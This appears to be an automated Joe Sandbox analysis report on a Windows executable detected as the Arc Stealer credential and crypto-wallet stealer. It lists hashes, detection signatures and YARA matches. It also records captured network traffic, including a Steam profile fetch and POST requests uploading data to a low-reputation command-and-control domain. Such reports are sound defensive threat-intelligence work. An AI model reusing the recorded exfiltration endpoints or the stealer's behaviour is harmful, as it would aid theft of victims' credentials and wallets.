Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
0x001900000002ab40-59.exe

Overview

General Information

Sample name:0x001900000002ab40-59.exe
Analysis ID:1450268
MD5:889cc88bca04e05c46d9e74636baee19
SHA1:28a273447716b7dea5526a499b801d025ac3ea6e
SHA256:00aac20f7fa77d5b959244157aad331bcdd28e3c4240e4a7106848625824fa78
Tags:exe
Infos:

Detection

Arc Stealer
Score:88
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected Arc Stealer
AI detected suspicious sample
Found many strings related to Crypto-Wallets (likely being stolen)
Performs DNS queries to domains with low reputation
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
PE / OLE file has an invalid certificate
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • 0x001900000002ab40-59.exe (PID: 7584 cmdline: "C:\Users\user\Desktop\0x001900000002ab40-59.exe" MD5: 889CC88BCA04E05C46D9E74636BAEE19)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000001.00000003.1722897393.0000000008297000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    00000001.00000002.1724281527.0000000005A64000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000001.00000003.1722996754.00000000082AB000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000001.00000002.1725697054.00000000082AE000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000001.00000002.1724191152.0000000005940000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Donutloader_f40e3759unknownunknown
          • 0x5f271:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
          Click to see the 2 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          1.2.0x001900000002ab40-59.exe.5942544.1.unpackWindows_Trojan_Donutloader_f40e3759unknownunknown
          • 0x59b2d:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
          1.2.0x001900000002ab40-59.exe.5942544.1.raw.unpackWindows_Trojan_Donutloader_f40e3759unknownunknown
          • 0x5cd2d:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB

          Sigma Signatures

          No Sigma rule has matched

          Snort Signatures

          No Snort rule has matched

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Multi AV Scanner detection for submitted file
          Source: 0x001900000002ab40-59.exeVirustotal: Detection: 19%Perma Link
          AI detected suspicious sample
          Source: Submited SampleIntegrated Neural Analysis Model: Matched 97.6% probability
          Source: 0x001900000002ab40-59.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
          Source: unknownHTTPS traffic detected: 104.102.42.29:443 -> 192.168.2.10:49708 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.10:49709 version: TLS 1.2
          Source: 0x001900000002ab40-59.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
          Source: Binary string: C:\BuildAgent\work\6a6d135591f2f49f\src\out\Default\win_clang_x86\lite_installer.exe.pdb source: 0x001900000002ab40-59.exe
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: 1_2_009232F1 FindFirstFileExW,1_2_009232F1
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: 1_2_009233A5 FindFirstFileExW,FindNextFileW,FindClose,FindClose,1_2_009233A5
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: 1_2_008CD950 FindFirstFileExW,GetLastError,GetFileAttributesW,FindNextFileW,FindClose,1_2_008CD950
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: 1_2_0089F490 GetLogicalDriveStringsW,QueryDosDeviceW,1_2_0089F490
          Source: C:\Users\user\Desktop\0x001900000002ab40-59.exeCode function: 4x nop then movd mm0, dword ptr [edx]1_2_00824577

          Networking

          barindex
          Performs DNS queries to domains with low reputation
          Source: DNS query: llal.xyz
          Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
          Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
          Source: Joe Sandbox ViewIP Address: 104.102.42.29 104.102.42.29
          Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
          Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
          Source: global trafficHTTP traffic detected: GET /profiles/76561199619938930 HTTP/1.1User-Agent: Mozilla/5.0 (Linux x86_64) AppleWebKit/600.48 (KHTML, like Gecko) Chrome/50.0.2598.249 Safari/603Host: steamcommunity.comCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /ujs/2ae977f4-db12-4876-9e4d-fc8d1778842d HTTP/1.1User-Agent: Mozilla/5.0 (Linux x86_64) AppleWebKit/600.48 (KHTML, like Gecko) Chrome/50.0.2598.249 Safari/603Host: llal.xyzCache-Control: no-cache
          Source: global trafficHTTP traffic detected: POST /Up/b HTTP/1.1Content-Type: application/octet-stream; boundary=----User-Agent: Mozilla/5.0 (Linux x86_64) AppleWebKit/600.48 (KHTML, like Gecko) Chrome/50.0.2598.249 Safari/603Host: llal.xyzContent-Length: 7745Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: POST /Up/b HTTP/1.1Content-Type: application/octet-stream; boundary=----User-Agent: Mozilla/5.0 (Linux x86_64) AppleWebKit/600.48 (KHTML, like Gecko) Chrome/50.0.2598.249 Safari/603Host: llal.xyzContent-Length: 11629Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: POST /Up/b HTTP/1.1Content-Type: application/octet-stream; boundary=----User-Agent: Mozilla/5.0 (Linux x86_64) AppleWebKit/600.48 (KHTML, like Gecko) Chrome/50.0.2598.249 Safari/603Host: llal.xyzContent-Length: 9177Cache-Control: no-cache
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: global trafficHTTP traffic detected: GET /profiles/76561199619938930 HTTP/1.1User-Agent: Mozilla/5.0 (Linux x86_64) AppleWebKit/600.48 (KHTML, like Gecko) Chrome/50.0.2598.249 Safari/603Host: steamcommunity.comCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /ujs/2ae977f4-db12-4876-9e4d-fc8d1778842d HTTP/1.1User-Agent: Mozilla/5.0 (Linux x86_64) AppleWebKit/600.48 (KHTML, like Gecko) Chrome/50.0.2598.249 Safari/603Host: llal.xyzCache-Control: no-cache
          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1633506996.0000000005A5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1633506996.0000000005A4D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Content-Security-Policydefault-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
          Source: global trafficDNS traffic detected: DNS query: steamcommunity.com
          Source: global trafficDNS traffic detected: DNS query: llal.xyz
          Source: unknownHTTP traffic detected: POST /Up HTTP/1.1Content-Type: application/octet-stream; boundary=----User-Agent: MyApp/1.0Host: llal.xyzContent-Length: 343Cache-Control: no-cache
          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1633024645.0000000005A79000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633465280.0000000005A6E000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633506996.0000000005A4D000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633506996.0000000005A5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:27060
          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1711911198.0000000008329000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1711911198.0000000008329000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
          Source: 0x001900000002ab40-59.exeString found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
          Source: 0x001900000002ab40-59.exeString found in binary or memory: http://crl.globalsign.com/codesigningrootr45.crl0U
          Source: 0x001900000002ab40-59.exeString found in binary or memory: http://crl.globalsign.com/gsgccr45evcodesignca2020.crl0
          Source: 0x001900000002ab40-59.exeString found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1711911198.0000000008329000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1711911198.0000000008329000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1711911198.0000000008329000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1711911198.0000000008329000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1711911198.0000000008329000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1711911198.0000000008329000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
          Source: 0x001900000002ab40-59.exeString found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
          Source: 0x001900000002ab40-59.exeString found in binary or memory: http://ocsp.globalsign.com/codesigningrootr450F
          Source: 0x001900000002ab40-59.exeString found in binary or memory: http://ocsp.globalsign.com/gsgccr45evcodesignca20200U
          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1711911198.0000000008329000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
          Source: 0x001900000002ab40-59.exeString found in binary or memory: http://ocsp2.globalsign.com/rootr606
          Source: 0x001900000002ab40-59.exeString found in binary or memory: http://secure.globalsign.com/cacert/codesigningrootr45.crt0A
          Source: 0x001900000002ab40-59.exeString found in binary or memory: http://secure.globalsign.com/cacert/gsgccr45evcodesignca2020.crt0?
          Source: 0x001900000002ab40-59.exeString found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1633465280.0000000005A6E000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633436838.0000000005AB3000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.1.drString found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1633465280.0000000005A6E000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633436838.0000000005AB3000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.1.drString found in binary or memory: http://store.steampowered.com/privacy_agreement/
          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1633465280.0000000005A6E000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633436838.0000000005AB3000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.1.drString found in binary or memory: http://store.steampowered.com/subscriber_agreement/
          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1633465280.0000000005A6E000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633436838.0000000005AB3000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.1.drString found in binary or memory: http://www.valvesoftware.com/legal.htm
          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1711911198.0000000008329000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1711911198.0000000008329000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1670010491.0000000008324000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
          Source: 0x001900000002ab40-59.exeString found in binary or memory: https://api.browser.yandex.net/configs/all_zip
          Source: 0x001900000002ab40-59.exeString found in binary or memory: https://api.browser.yandex.net/configs/all_zipbrandID=&partnerID=?Failed
          Source: 0x001900000002ab40-59.exeString found in binary or memory: https://api.browser.yandex.net/content/get/experiments/browser.proto
          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1633506996.0000000005A5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.steampowered.com/
          Source: 76561199619938930[1].htm.1.drString found in binary or memory: https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1712081694.0000000008357000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1712269375.000000000835A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&ci=1696497267574.12791&key=1696497267400700
          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1712081694.0000000008357000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1712269375.000000000835A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&ci=1696497267574.12791&key=1696497267400700002.1&cta
          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1633024645.0000000005A79000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633465280.0000000005A6E000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633506996.0000000005A4D000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633506996.0000000005A5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://broadcast.st.dl.eccdnx.com
          Source: 0x001900000002ab40-59.exeString found in binary or memory: https://browser.yandex.
          Source: 0x001900000002ab40-59.exeString found in binary or memory: https://browser.yandex.byua?&=full=1baneridbetabetacustobgidcalypsocustoexpcalypsofootballpartner_id
          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1633024645.0000000005A79000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633465280.0000000005A6E000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633506996.0000000005A4D000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633506996.0000000005A5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/
          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1670010491.0000000008324000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1670010491.0000000008324000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1670010491.0000000008324000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1633024645.0000000005A79000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633465280.0000000005A6E000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633506996.0000000005A4D000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633506996.0000000005A5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://checkout.steampowered.com/
          Source: 0x001900000002ab40-59.exe, 00000001.00000002.1724281527.0000000005A64000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1647321556.0000000005A64000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.st
          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1633506996.0000000005A5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/
          Source: 0x001900000002ab40-59.exe, 00000001.00000002.1724281527.0000000005A64000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1647321556.0000000005A64000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/c
          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1633465280.0000000005A6E000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633436838.0000000005AB3000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.1.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=Hpc3R3GOITg3&a
          Source: 0x001900000002ab40-59.exe, 00000001.00000002.1724281527.0000000005A64000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1647321556.0000000005A64000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMB
          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1633465280.0000000005A6E000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633506996.0000000005A64000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633436838.0000000005AB3000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.1.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english
          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1633465280.0000000005A6E000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633506996.0000000005A64000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633436838.0000000005AB3000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.1.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp
          Source: 0x001900000002ab40-59.exe, 00000001.00000002.1724281527.0000000005A64000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1647321556.0000000005A64000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/header.css?1
          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1633465280.0000000005A6E000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633506996.0000000005A64000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633436838.0000000005AB3000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.1.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&l=english
          Source: 0x001900000002ab40-59.exe, 00000001.00000002.1724281527.0000000005A64000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1647321556.0000000005A64000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/mo
          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1633465280.0000000005A6E000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633506996.0000000005A64000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633436838.0000000005AB3000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.1.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.TP5s6TzX6LLh
          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1633465280.0000000005A6E000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633506996.0000000005A64000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633436838.0000000005AB3000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.1.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&l=englis
          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1633465280.0000000005A6E000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633436838.0000000005AB3000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.1.drString found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1633465280.0000000005A6E000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633436838.0000000005AB3000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.1.drString found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1633465280.0000000005A6E000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633436838.0000000005AB3000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.1.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1633465280.0000000005A6E000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633436838.0000000005AB3000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.1.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=49iUccgO
          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1633465280.0000000005A6E000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633436838.0000000005AB3000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.1.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=ttNb
          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1633465280.0000000005A6E000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633506996.0000000005A64000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633436838.0000000005AB3000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.1.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/global.js?v=B7Vsdo1okyaC&l=english
          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1633465280.0000000005A6E000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633506996.0000000005A64000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000002.1724281527.0000000005A64000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633436838.0000000005AB3000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1647321556.0000000005A64000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.1.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC
          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1633465280.0000000005A6E000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633436838.0000000005AB3000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.1.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalContent.js?v=L35TrLJDfqtD&l=engl
          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1633465280.0000000005A6E000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633436838.0000000005AB3000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.1.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=english
          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1633465280.0000000005A6E000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633436838.0000000005AB3000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.1.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/profile.js?v=Iy1ies1ROjUT&l=english
          Source: 0x001900000002ab40-59.exe, 00000001.00000003.1633465280.0000000005A6E000.00000004.00000020.00020000.00000000.sdmp, 0x001900000002ab40-59.exe, 00000001.00000003.1633436838.0000000005AB3000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.1.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&l=en
